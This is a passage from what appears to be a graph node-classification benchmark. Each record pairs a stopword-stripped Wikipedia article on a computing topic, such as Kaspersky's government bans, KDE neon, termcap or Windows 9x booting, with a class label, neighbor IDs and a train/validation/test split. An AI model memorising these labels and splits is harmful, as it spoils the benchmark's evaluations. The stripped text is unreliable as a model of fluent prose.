chinese government building decidedly dystopian one ’ think anyone would want share ‘ common future. ’ apple spoken endorsed u.s senator patrick leahy told cnbc american tech companies become leading champions free expression commitment end borders ... global leaders innovation like apple opportunity moral obligation promote free expression basic human rights countries routinely deny rights cook told reuters hope time things couple things ’ pulled come back great hope great optimism however techcrunch jon russell criticized line thinking writing firstly apple ’ remove couple things reach china-based users rather couple hundred apps acknowledging even counting furthermore russell listed censorship efforts chinese government including vpn bans restrictions live video messaging apps wrote apple little choice follow beijing ’ line order continue business lucrative chinese market statements like cook ’ today dangerous massively underplay severity situation florida senator marco rubio also criticized cook appearance world internet conference describing situation ’ example company view desperate access chinese market place willing follow laws country even laws run counter companies ’ standards supposed august 2018 result chinese regulations 25,000 illegal apps pulled apple app store china",
    "neighbors": [
      10755,
      9732,
      5125,
      10760,
      1549,
      5647,
      6672,
      7697,
      3602,
      8213,
      6680,
      11289,
      9245,
      10270,
      9247,
      5155,
      5670,
      6186,
      4139,
      6700,
      5677,
      7722,
      9262,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1089,
      10817,
      6222,
      8783,
      3152,
      1619,
      3667,
      4180,
      6227,
      1623,
      3672,
      10838,
      9311,
      4704,
      3681,
      9826,
      5733,
      8806,
      11365,
      3691,
      9324,
      2673,
      1138,
      2676,
      5749,
      2168,
      6264,
      7292,
      7293,
      2686,
      5758,
      6783,
      7806,
      10368,
      10878,
      4746,
      8842,
      9354,
      6797,
      9356,
      10900,
      5784,
      1177,
      10392,
      4251,
      3228,
      10394,
      2207,
      3749,
      11430,
      4775,
      171,
      6828,
      2735,
      3248,
      7857,
      4283,
      3772,
      5819,
      190,
      7869,
      8903,
      713,
      3790,
      4302,
      7378,
      2259,
      4309,
      3286,
      9430,
      6361,
      3293,
      4318,
      6367,
      6368,
      8413,
      5858,
      6884,
      741,
      10470,
      231,
      2281,
      2282,
      9451,
      236,
      1772,
      4844,
      10478,
      11000,
      6393,
      8441,
      7420,
      2304,
      2819,
      11525,
      1290,
      3338,
      7435,
      7947,
      9487,
      784,
      9999,
      10512,
      1299,
      788,
      1813,
      5397,
      4888,
      5912,
      8476,
      9508,
      5927,
      10023,
      6446,
      303,
      4399,
      7983,
      1842,
      823,
      2872,
      7991,
      2363,
      2365,
      2366,
      1855,
      9022,
      11584,
      1346,
      10562,
      838,
      7496,
      2892,
      3918,
      8014,
      2388,
      4951,
      7515,
      9564,
      4957,
      10078,
      6495,
      2401,
      1379,
      9574,
      9063,
      8554,
      10602,
      3948,
      11629,
      10096,
      10608,
      7029,
      7541,
      4995,
      8068,
      9605,
      3462,
      2439,
      6023,
      6537,
      8582,
      2955,
      6539,
      7052,
      1428,
      5524,
      11162,
      3483,
      10141,
      10655,
      2979,
      9123,
      11173,
      7590,
      3499,
      8109,
      6583,
      2492,
      10172,
      446,
      7614,
      9151,
      7106,
      8644,
      2502,
      9671,
      456,
      1482,
      5067,
      5578,
      5070,
      463,
      464,
      6608,
      7118,
      8662,
      9174,
      2010,
      7133,
      9182,
      4068,
      5093,
      7140,
      487,
      488,
      2023,
      5096,
      6119,
      5612,
      8170,
      1522,
      5619,
      7154,
      3573,
      11254,
      11257,
      6654
    ],
    "mask": "Train"
  },
  {
    "node_id": 9064,
    "label": 3,
    "text": "KDE_neon:kde neon kde neon linux distribution developed kde based recent ubuntu long-term support lts release bundled set additional software repositories containing latest 64-bit versions plasma 5 desktop environment/framework qt 5 toolkit compatible kde software first announced june 2016 kubuntu founder jonathan riddell following departure canonical ubuntu parent company adopted steadily growing number linux users regularly appearing top 20 distrowatch.com popularity tables targets user demographic ubuntu official kde plasma-focused distribution kubuntu differing primarily much shorter time-frame users receive updated qt kde software offered four release channels user testing unstable developer editions kde neon linux distribution focused development kde emphasis bleeding edge software packages sourced directly kde offers programmers early access new features potentially cost greater susceptibility software bugs kde neon announced january 2017 distribution switching installer ubiquity calamares due ubiquity features february 2018 kde neon developers removed lts editions downloads page kept editions download mirrors lots people asking edition use difference may 2018 kde started changing kde neon based ubuntu 16.04 ubuntu 18.04 kde neon preview images based ubuntu 18.04 became available august 2018 kubuntu kde plasma suite ubuntu base os kde neon often mistaken kubuntu vice versa however primary difference two operating systems kubuntu maintains stable releases lts version ubuntu kde neon focuses updating developer editions kde applications without maintaining stable releases ubuntu unless root user actively chooses upgrade systems kde slimbook kde neon pre-installed well 1080p pinebook",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      8262,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8476,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      7492,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      7020,
      7534,
      11121,
      9074,
      11648,
      3969,
      390,
      1416,
      905,
      2955,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      5078,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      2045,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 9065,
    "label": 9,
    "text": "Brouwer–Heyting–Kolmogorov_interpretation:brouwer–heyting–kolmogorov interpretation mathematical logic brouwer–heyting–kolmogorov interpretation bhk interpretation intuitionistic logic proposed l. e. j. brouwer arend heyting independently andrey kolmogorov also sometimes called realizability interpretation connection realizability theory stephen kleene interpretation states intended proof given formula specified induction structure formula interpretation primitive proposition supposed known context context arithmetic proof formula computation reducing two terms numeral kolmogorov followed lines phrased interpretation terms problems solutions assert formula claim know solution problem represented formula instance formula_7 problem reducing q p solve requires method solve problem q given solution problem p identity function proof formula formula_22 matter p law non-contradiction formula_23 expands formula_24 putting together proof formula_24 function formula_8 converts pair b – formula_30 proof p formula_31 function converts proof p proof formula_19 – proof formula_19 function formula_8 formula_42 proving law non-contradiction matter p indeed line thought provides proof formula_43 well formula_3 proposition hand law excluded middle formula_45 expands formula_46 general proof according interpretation proof formula_45 pair b 0 b proof p 1 b proof formula_17 thus neither p formula_17 provable neither formula_45 general possible logical system formal negation operator proof formula_2 exactly n't proof formula_2 see gödel incompleteness theorems bhk interpretation instead takes formula_2 mean formula_2 leads absurdity designated formula_19 proof ¬formula_2 function converting proof formula_2 proof absurdity standard example absurdity found dealing arithmetic assume 0 1 proceed mathematical induction 0 0 axiom equality induction hypothesis 0 equal certain natural number n 1 would equal n +1 peano axiom sm sn n since 0=1 therefore 0 would also equal n 1 induction 0 equal numbers therefore two natural numbers become equal therefore way go proof 0=1 proof basic arithmetic equality thus proof complex arithmetic proposition furthermore get result necessary invoke peano axiom states 0 successor natural number makes 0=1 suitable formula_19 heyting arithmetic peano axiom rewritten 0 n → 0 s0 use 0 1 validates principle explosion bhk interpretation depend view taken constitutes function converts one proof another converts element domain proof different versions constructivism diverge point kleene realizability theory identifies functions computable functions deals heyting arithmetic domain quantification natural numbers primitive propositions form x=y proof x=y simply trivial algorithm x evaluates number always decidable natural numbers otherwise proof built induction complex algorithms one takes lambda calculus defining notion function bhk interpretation describes correspondence natural deduction functions",
    "neighbors": [
      8926
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9066,
    "label": 3,
    "text": "Architecture_of_Windows_9x:architecture windows 9x windows 9x series operating systems refers kernel lies heart windows 9x architecture monolithic basic code considered similar function ms-dos 16-/32-bit hybrid requires ms-dos support operate windows 95 boots using following set files 32-bit shell command line interpreter windows 95 core registry configuration files virtual machine manager configuration manager installable file system manager device drivers system may also use config.sys contains settings commands executed loading command interpreter autoexec.bat batch file automatically executed loading command.com however two files critical boot process io.sys contains default setting case absence system windows config.sys autoexec.bat processed logo.sys may used splash screen windows 9x startup process consists 6 phases first two steps common operating system booting using traditional combination bios master boot record rom bios starts execution physical memory address ffff0h phase bios first executes power-on self-test checks existence boot disk drive found drive rom bios checks hard disk computer plug play bios addition bios checks ram i/o port addresses interrupt lines dma channels plug play devices disables found devices creates maps used unused resources re-enables devices master boot record loaded address 7c00h loads boot sector windows disk partition boot sector contains disk boot program bios parameter block table searches location root directory io.sys file loads io.sys file memory io.sys initializes minimal file allocation table driver loads msdos.sys memory displays starting windows depending bootdelay line msdos.sys file loads logo.sys file displays startup image screen drvspace.ini dblspace.ini file exists also loads drivers compressed disks windows attempts open registry file system.dat fails attempts open system.da0 configured msdos.sys registry double buffering also enabled windows 95 windows 98 analyze config.sys load ms-dos real mode drivers windows ignores config.sys file exist io.sys file loads drivers ifshlp.sys himem.sys setver.exe windows reserves upper memory blocks windows 95 operating system use expanded memory windows 95 windows 98 execute command.com process autoexec.bat loads terminate stay resident programs memory windows ignores step io.sys runs win.com win.com loads vmm32.vxd file memory accesses hard disk file contains important drivers real-mode virtual device driver loader checks duplicate virtual device drivers exist windows\\system\\vmm32 folder vmm32.vxd file case duplicates driver windows\\system\\vmm32 directory loaded windows 95 98 query real mode drivers calling int 2fh search drivers registry entry hkey_local_machine\\system\\currentcontrolset\\services\\vxd marked loaded external file vmm32 analyzes 386 enh section windows\\system.ini file loads drivers listed important drivers loaded even listed windows registry system.ini windows\\system\\vmm32 directory real-mode virtual device drivers loaded driver initialization windows 95 windows 98 occurs vmm32 switches cpu real mode protected mode next step initialization protected mode drivers executed three phases device critical part initialization interrupts disabled device initialization file i/o allowed initcomplete phase initialization display driver windows switches graphical mode drivers loaded kernel32.dll gdi32.dll gdi.exe user32.dll user.exe shell32.dll explorer.exe files loaded next step startup process load network environment user prompted log network configured user logs desktop settings loaded registry desktop configuration uses default desktop windows starts programs defined startup folder win.ini programs defined registry keys run runonce runservices runservicesonce inside branches hkey_local_machine\\software\\microsoft\\windows\\currentversion hkey_current_user\\software\\microsoft\\windows\\currentversion\\ program runonce registry key started program removed key windows 9x kernel 32-bit kernel virtual memory drivers provided .vxd files since windows 98 newer wdm drivers used however ms-dos kernel stays resident memory windows use old ms-dos 16-bit drivers installed",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      10281,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      9813,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      9340,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7325,
      9377,
      3235,
      4771,
      6820,
      1703,
      5300,
      2749,
      200,
      9420,
      2782,
      1247,
      9442,
      4836,
      4326,
      2279,
      3308,
      10993,
      3834,
      2811,
      1791,
      8959,
      11519,
      3856,
      11539,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      7483,
      6972,
      3394,
      3922,
      4439,
      4441,
      5465,
      2402,
      4458,
      6506,
      9593,
      2943,
      1418,
      5003,
      5004,
      10130,
      11677,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      954,
      960,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      5080,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      1515,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 9067,
    "label": 1,
    "text": "Termcap:termcap termcap terminal capability software library database used unix-like computers enables programs use display computer terminals device-independent manner greatly simplifies process writing portable text mode applications bill joy wrote first termcap library 1978 berkeley unix operating system since ported unix unix-like environments joy design reportedly influenced design terminal data store earlier incompatible timesharing system termcap database describe capabilities hundreds different display terminals allows programs character-based display output independent type terminal on-screen text editors vi emacs examples programs may use termcap programs listed category examples database describes termcap databases consist one descriptions terminals description must contain canonical name terminal may also contain one aliases name terminal canonical name aliases keys library searches termcap database description contains one capabilities conventional names capabilities typed boolean numeric string termcap library predetermined type capability name determines types capability syntax applications use termcap expect specific types commonly used capabilities obtain values capabilities termcap database using library calls return successfully database contents matches assumed type termcap descriptions constructed including contents one description another suppressing capabilities included description overriding adding capabilities matter storage model used termcap library constructs terminal description requested description including suppressing overriding time request termcap data stored text making simple modify text retrieved termcap library files environment variables term environment variable contains terminal type name termcap environment variable may contain termcap database often used store single termcap description set terminal emulator provide terminal characteristics shell dependent programs termpath environment variable supported newer termcap implementations defines search path termcap files original common implementation termcap library retrieves data flat text file searching large termcap file e.g. 500 kb slow aid performance utility reorder used put frequently used entries near beginning file bsd-4.4 based implementations termcap store terminal description hashed database e.g. something like berkeley db version 1.85 store two types records aliases point canonical entry canonical entry text termcap entry stored literally original termcap implementation designed use little memory newer implementations termcap interface generally require two-character name beginning entry capability names still two characters implementations tgetent function used read terminal description uses buffer whose size must large enough data assumed 1024 characters newer implementations termcap interface may relax constraint allowing null pointer place fixed buffer hiding data would fit e.g. via zz capability netbsd termcap terminfo library interface also emulates termcap interface actually use fixed-size buffer terminfo library emulation termcap allows multiple entries included without restricting position newer implementations termcap library may also provide ability though well documented special capability hz capability defined specifically support hazeltine 1500 terminal unfortunate characteristic using ascii tilde character '~ control sequence introducer order support terminal code used database know using tilde introduce certain control sequences also know substitute another printable character tildes displayed text since tilde text would interpreted terminal start control sequence resulting missing text screen garbling additionally attribute markers start end underlining took space screen comments database source code often referred hazeltine braindamage since hazeltine 1500 widely used terminal late 1970s important applications able deal limitations",
    "neighbors": [
      6787,
      1316,
      8516,
      7847,
      7983,
      8984,
      2804,
      2901,
      5397,
      1335,
      7188,
      1594,
      1147
    ],
    "mask": "None"
  },
  {
    "node_id": 9068,
    "label": 4,
    "text": "Kaspersky_bans_and_allegations_of_Russian_government_ties:kaspersky bans allegations russian government ties company kaspersky lab faced controversy allegations engaged russian federal security service fsb —ties company actively denied u.s. department homeland security banned kaspersky products government departments 13 september 2017 alleging kaspersky lab worked secret projects russia federal security service fsb october 2017 subsequent reports alleged hackers working russian government stole confidential data home computer national security agency contractor 2015 via kaspersky antivirus software kaspersky denied allegations stating software detected equation group malware samples uploaded servers analysis normal course operation company since announced commitments increased accountability soliciting independent reviews verification software source code announcing would migrate core infrastructure foreign customers russia switzerland according international new york times kaspersky become one russia recognized high-tech exports market share united states hampered origins according gartner evidence back doors software ties russian mafia state ... still concern ’ operate russia without controlled ruling party ceo eugene kaspersky prior work russian military education kgb-sponsored technical college led allegations employed russia expose us cyberweapons though denies analysts gartner peter firstbrook say suspicions firm ’ russian roots hindered expansion us company denied direct ties engaged russian government august 2015 bloomberg news reported kaspersky lab changed course 2012 high-level managers left fired jobs often filled people closer ties russia military intelligence services people actively aid criminal investigations fsb kgb ’ successor using data 400 million customers kaspersky slammed bloomberg coverage blog calling coverage sensationalist guilty exploiting paranoia increase readership july 2017 december 2017 u.s. government agencies phased use kaspersky software july 2017 united states general services administration gsa removed kaspersky lab list vendors authorized business u.s. government amid reports bloomberg mcclatchy dc alleging kaspersky lab worked secret projects russia federal security service fsb anti-russian sentiment also grown country wake investigation russian interference 2016 presidential election kaspersky denied reports stating inappropriate ties government never received request russian government affiliated organization create participate secret projects including one anti-ddos protection 8 september 2017 u.s. electronics store chain best buy pulled kaspersky products amid concerns ties 13 september 2017 department homeland security issued order stating 90 days kaspersky products banned use within u.s. civilian federal government citing concerns ties certain kaspersky officials russian intelligence government agencies requirements russian law allow russian intelligence agencies request compel assistance kaspersky intercept communications transiting russian networks 6 october 2017 wall street journal —citing multiple people knowledge matter —alleged 2015 hackers working russian government used kaspersky antivirus software steal classified material home computer belonging national security agency nsa contractor according report incident occurred 2015 remained undiscovered early 2016 stolen material reportedly included details nsa penetrates foreign computer networks computer code uses spying defends networks inside u.s. new york times reported hacks discovered israeli intelligence agents hacked kaspersky network 11 october 2017 wall street journal additionally alleged russian intelligence uses kaspersky software scan computers worldwide material interest company denied reports arguing baseless paranoia witch hunt considered suspicious major u.s. media outlets simultaneously went us almost full force fantasized simultaneously receiving order 've got confused details 23 october 2017 kaspersky announced global transparency initiative would accountable security issues surrounding products would allow third-party analysts validate products business practices order validate integrity company stated trust must repeatedly earned ongoing commitment transparency accountability program reaffirmation company commitment earning maintaining trust customers partners every day 25 october 2017 kaspersky confirmed incident described wall street journal occurred 2014 result software detected zip file containing samples source code equation group user enabled kaspersky security network ksn features software files automatically uploaded kaspersky malware sample ksn analysis assumption new malware variant eugene kaspersky stated ordered sample destroyed kaspersky claimed antivirus software temporarily disabled pc user order install pirated copy microsoft office software re-enabled detected equation group code well unrelated backdoor infections created keygen program office may facilitated third-party access computer 13 november 2017 british intelligence agency mi6 raised suspicions kaspersky lab software distributed free 2 million uk barclays customers 2 december 2017 barclay announced would longer provide new customers company software also around 2 december 2017 britain national cyber security centre advised national security precaution uk government departments avoid russia-based anti-virus software kaspersky stated compelling case present extend advice wider public 9 december 2017 u.s. government banned kaspersky federal civilian military computers part broader defense bill january 2018 twitter banned kaspersky advertising twitter stating kaspersky lab operates using business model inherently conflicts acceptable twitter ads business practices citing department homeland security warning kaspersky 15 may 2018 kaspersky lab announced would migrating core infrastructure russia new data centres switzerland kaspersky software antivirus definitions foreign markets compiled digitally signed switzerland end 2018 products targeting russia still compiled existing domestic infrastructure user data foreign markets stored processed swiss servers end 2019 swiss operations overseen third-party organization holding access necessary verify trustworthiness products business processes accompanied one three planned transparency centre facilities responsible stakeholders allowed inspect kaspersky source code business practices verify integrity kaspersky stated move first foremost response evolving ultra-connected global landscape challenges cyber-world currently facing step goal accountable trustworthy business practices december 2017 february 2018 company sued trump administration arguing ban bill attainder violation due process arguing government unfairly tarnished kaspersky reputation cases dismissed may 30 2018 judge colleen kollar-kotelly former presiding judge foreign intelligence surveillance court declaring unsubstantial",
    "neighbors": [
      1440,
      7809,
      107,
      7887,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 9069,
    "label": 1,
    "text": "Distributed_concurrency_control:distributed concurrency control distributed concurrency control concurrency control system distributed computer network bernstein et al 1987 weikum vossen 2001 database systems transaction processing transaction management distributed concurrency control refers primarily concurrency control distributed database also refers concurrency control multidatabase multi-transactional object environment e.g. federated database grid computing cloud computing environments major goal distributed concurrency control distributed serializability global serializability multidatabase systems distributed concurrency control poses special challenges beyond centralized one primarily due communication computer latency often requires special techniques like distributed lock manager fast computer networks low latency like switched fabric e.g. infiniband commitment ordering commit ordering general serializability technique achieves distributed serializability global serializability particular effectively large scale without concurrency control information distribution e.g. local precedence relations locks timestamps tickets thus without performance penalties typical serializability techniques raz 1992 common distributed concurrency control technique strong strict two-phase locking ss2pl also named rigorousness also common centralized concurrency control technique ss2pl provides serializability strictness commitment ordering properties strictness special case recoverability utilized effective recovery failure commitment ordering allows participating general solution global serializability large-scale distribution complex transactions distributed locking typical heavy performance penalty due delays latency saved using atomic commitment protocol needed distributed database distributed transactions atomicity e.g. two-phase commit simpler one reliable system together local commitment ordering variant e.g. local ss2pl instead distributed locking achieve global serializability entire system commitment ordering theoretical results applicable whenever atomic commitment utilized partitioned distributed recoverable transactional data including automatic distributed deadlock resolution technique utilized also large-scale parallel database single large database residing many nodes using distributed lock manager replaced homogeneous multidatabase comprising many relatively small databases loosely defined process supports transactions partitioned data participates atomic commitment complies fitting single node using commitment ordering e.g. ss2pl strict co together appropriate atomic commitment protocol without using distributed lock manager",
    "neighbors": [
      5441,
      4194,
      5956,
      3398,
      11377,
      7446,
      1049,
      5658,
      7581,
      3326
    ],
    "mask": "Test"
  },
  {
    "node_id": 9070,
    "label": 7,
    "text": "Fork_Particle:fork particle fork particle computer graphics visual effects modeling software development kit sdk developed sold fork particle inc fork particle uses real time particle system technology simulate visual effects particle effects cgi explosions fire rain smoke dust etc fork particle used video games visual simulation software flight simulator licensed game developers windows macos linux playstation 3 playstation 4 xbox 360 xbox one notable fork particle licensees include ubisoft trickstar games firaxis games zenimax online studios electronic arts microsoft lego sony video games utilized fork particle ’ technology include elder scrolls online rocksmith 2014 edition empire earth iii lego universe splosion man sid meier civilization v sid meier civilization vi fork particle real time technology component particle engine meant integrated used video game engine computer graphics engine particle effects authored vfx artists designers using fork particle ’ effects modeling tool brought user ’ 3d computer graphics environment 2d computer graphics environment particle effects simulated fork particle ’ engine real time displayed user application ’ graphics engine fork particle sdk includes components real time particle engine fork runtime sdk particle editor modeling tool fork particle studio live update application particle effects editing fork live tuner particle effects definitions batch file exporter fork particle also includes incorporation integrations partner technologies",
    "neighbors": [
      2338,
      8937,
      6797,
      7983,
      10675,
      823,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 9071,
    "label": 7,
    "text": "Glide_OS:glide os glide os cross-platform web desktop developed jumptuit notable operating desktop operating systems like microsoft windows mac os x linux mobile operating systems like apple ios google android honeycomb blackberry os blackberry tablet os qnx webos symbian windows mobile glide os compatible variety web browsers including microsoft internet explorer mozilla firefox apple safari google chrome jumptuit originally transmedia founded donald leka began develop cloud computing platform could manage media across proprietary platforms company shifted focus business clients consumers unveiling glide national association broadcasters nab convention april 18 2005 launching free consumer version november 30 2005 current html5 version glide 4.0 presented harvard university cyberposium 16 technology conference november 13 2010 previous version 3.0 launched may 20 2008 things digital conference allthingsd 2006 intel announced plans include glide ultra-mobile pcs however project yet manifested consumer product glide provides support tablets including apple ipad hp touchpad blackberry playbook samsung galaxy motorola xoom recently amazon kindle fire barnes noble nook tablet glide os company numerous awards including pc world top 100 products year laptop magazine top 50 products year econtent magazine top 100 companies year red herring top 100 companies year among others glide features desktop-like interface displays desktop glide hd web portal glide includes several web-based applications including integrated office suite media players photo editor calendar software webmail address book micro-blogging service publishing platform internet search client",
    "neighbors": [
      4194,
      2259
    ],
    "mask": "None"
  },
  {
    "node_id": 9072,
    "label": 0,
    "text": "Text_Analysis_Portal_for_Research:text analysis portal research tapor text analysis portal research gateway highlights tools code snippets usable text analysis types project housed university alberta currently led geoffrey rockwell stéfan sinclair kirsten c. uszkalo milena radzikowska users portal explore tools use research rate review comment tools browse curated lists recommended tools add tags tools tool pages tapor consist short description authorial information screenshot tool tags suggested related tools user ratings comments code snippet pages also contain excerpt code link full code location online earlier version portal based mcmaster university consisted network six leading humanities computing centres canada mcmaster university victoria collaboration malaspina uc university alberta university toronto université de montréal law university new brunswick tapor developed network nodes universities across canada would servers local labs best text tools industry sources could aggregated made available would supplemented representative texts special infrastructure ... earlier version allowed researchers experiment text analysis tools either using without account tapor tools interface getting account could define texts wanted operate create list favorite tools tapor also sponsored casta canadian symposium text analysis conferences including face text casta 2004 focused text visualization selected papers face text published text technology journal computer text processing",
    "neighbors": [
      8440,
      7414
    ],
    "mask": "None"
  },
  {
    "node_id": 9073,
    "label": 4,
    "text": "LIDB:lidb lidb acronym line information database used united states canada traditional telephone companies store retrieve caller id records local phone switches also known class 5 switches use ss7 signaling protocol query centralized databases pass information call set",
    "neighbors": [
      11170
    ],
    "mask": "None"
  },
  {
    "node_id": 9074,
    "label": 4,
    "text": "Devuan:devuan devuan fork debian uses sysvinit instead systemd default newer debian releases project name portmanteau debian vua veteran unix admins release debian 8 alienated developers users due project adoption systemd first stable release devuan published may 25 2017 devuan package repository mirrors upstream debian local modifications made needed allow init systems systemd modified packages include policykit udisks devuan supposed work like corresponding debian release devuan provide systemd repositories still retains libsystemd0 removed dependencies instead continuing debian practice using toy story character names release codenames devuan aliases releases using planet names first stable release shared debian 8 codename jessie however devuan release named minor planet 10464 second stable release named ascii minor planet 3568 permanent alias devuan unstable branch ceres named dwarf planet devuan 2.0.0 ascii released june 9 2018",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      4123,
      4637,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      9324,
      10860,
      5742,
      2671,
      11388,
      2180,
      2692,
      8326,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      6934,
      4887,
      8476,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      1849,
      3387,
      3903,
      11587,
      2375,
      5959,
      5962,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      7027,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10687,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      3068,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 9075,
    "label": 1,
    "text": "Row_(database):row database context relational database row—also called tuple—represents single implicitly structured data item table simple terms database table thought consisting rows columns row table represents set related data every row table structure example table represents companies row would represent single company columns might represent things like company name company street address whether company publicly held vat number etc.. table represents association employees departments row would associate one employee one department implicit structure row meaning data values row requires row understood providing succession data values one column table row interpreted relvar composed set tuples tuple consisting two items name relevant column value row provides column column expects data value particular type example one column might require unique identifier another might require text representing person name another might require integer representing hourly pay cents",
    "neighbors": [
      128,
      2432,
      10628,
      10632,
      8201,
      11023,
      6418,
      8979,
      2068,
      8340,
      7446,
      10389,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      11030,
      4255,
      5151,
      9248,
      9631,
      9634,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      10925,
      2936,
      9397,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      864,
      4065,
      4066,
      7523,
      9828,
      10340,
      10849,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      7412,
      1142,
      888,
      1146,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 9076,
    "label": 3,
    "text": "Linux_for_Tegra:linux tegra linux tegra linux4tegra l4t gnu/linux based system software distribution nvidia nvidia tegra processor series used nvidia jetson board series sort sibling nvidia vibrante linux publications system software comes example jetpack software development kit sdk nvidia official nvidia download page bears entry jetpack 3.2 uploaded 2018-03-08 states",
    "neighbors": [
      3585,
      2635,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9077,
    "label": 3,
    "text": "Inindo:_Way_of_the_Ninja:inindo way ninja inindo way ninja 伊忍道 打倒信長 inindou datou nobunaga スーパー伊忍道 打倒信長 super inindou datou nobunaga super famicom version role-playing video game developed published koei originally released pc8801sr pc9801 msx2 home computer sharp x68000 remade super nes also released north america game fictional account japan warring states period set 1582 player assumes role iga ninja whose village destroyed conquest demonic warlord oda nobunaga ninja must travel across feudal japan enlisting aid numerous ninja sages hermits ronin samurai wizards companions order avenge clan game fictitious account end oda nobunaga campaign conquer unify japan beginning game references rebellion akechi mitsuhide honnō-ji temple historical nobunaga died committing seppuku time game point year 1601 would prior birth tokugawa shogunate tokugawa ieyasu actual game begins year 1582 player kill nobunaga end year 1601 game several hazardous dungeons stand path victory well selection optional dungeons played order player chooses encounters monsters outlaws occur randomly dungeons game world map player characters npcs move around battlefield turn-based fashion attack cast magic spells use items complete game player must recruit npcs order successfully survive dungeons large scale battles order recruit characters player must build certain degree trust talking tea houses inns every character recruited characters rival clans join player strategy war simulation elements game well gaining trust japanese feudal lord spying committing acts sabotage competing daimyo player join battle provinces characterized era outcome battles changes lords possession individual provinces alter outcome game aid hinder player progress neighboring provinces nobunaga must conquered order advance final section game middle stories player follows either normal path magician path randomly selected completing first dungeon quest path leads different enemies random encounters example magician path causes western mythological monsters hellhound marchosias appear due smaller resolution snes character names shortened chinese version ported ms-dos 1993 playable english os 2003 pc-9801 version game ported windows 98 part koei 25th anniversary pack vol.1 standalone version published 2005 windows version runs pc-9801 game emulator saving emulator emulates drive switching operation port requires use mouse third scenario inaccessible running emulated environment gamepro review called inindo impressive mix adventure fantasy epic military strategy good rpg featuring myth magic mayhem history great fantasy",
    "neighbors": [
      9166,
      10999
    ],
    "mask": "Test"
  },
  {
    "node_id": 9078,
    "label": 9,
    "text": "BeanShell:beanshell beanshell java-like scripting language invented patrick niemeyer runs java runtime environment jre uses variation java syntax addition scripting commands syntax beanshell allows users define functions called within script underpinning philosophy pollute syntax many extensions syntactic sugar thereby ensuring code written java compiler usually executed interpretively beanshell without changes almost much vice versa makes beanshell popular testing debugging tool java virtual machine jvm platform beanshell supports scripted objects simple method closures like perl javascript beanshell open source project incorporated many applications apache openoffice apache ant weblogic server application server apache jmeter jedit imagej jump gis apache taverna many others beanshell provides easy integrate application programming interface api also run command-line mode within graphical environment first versions beanshell 0.96 1.0 released patrick niemeyer 1999 followed series versions beanshell 1.3.0 released august 2003 version 2.0b1 released september 2003 culminating version 2.0b4 may 2005 january 2015 newest release posted official webpage beanshell included linux distribution debian since 1999 beanshell undergoing standardization java community process jcp jsr 274 following jcp approval beanshell jsr review ballot june 2005 visible activity taking place around beanshell jsr 274 status dormant since java 9 java instead includes jshell different read–eval–print loop repl shell 